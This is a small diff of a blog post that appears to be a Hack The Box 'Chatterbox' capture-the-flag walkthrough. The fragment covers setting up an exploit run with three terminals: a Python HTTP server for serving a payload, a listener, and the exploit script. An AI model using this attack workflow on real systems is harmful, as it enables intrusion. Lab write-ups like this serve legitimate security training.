t3lesph0re/t3lesph0re.github.io/_posts/2025-10-14-htb_chatterbox.md

 sock.close()
 ```

-Once you have updated this script, we will need 3 seperate terminals: Python HTTP server, listener, and the exploit script.
+Once you have updated this script (I downloaded it as it s defauly file name `36025`), we will need 3 seperate terminals: Python HTTP server, listener, and the exploit script.

 1. Start the HTTP python server:

+<pre><code>

 ```bash
 t3lesph0re@neptune:~$ python3 -m http.server 80
 ```

+</code></pre>

 2. Start the listener: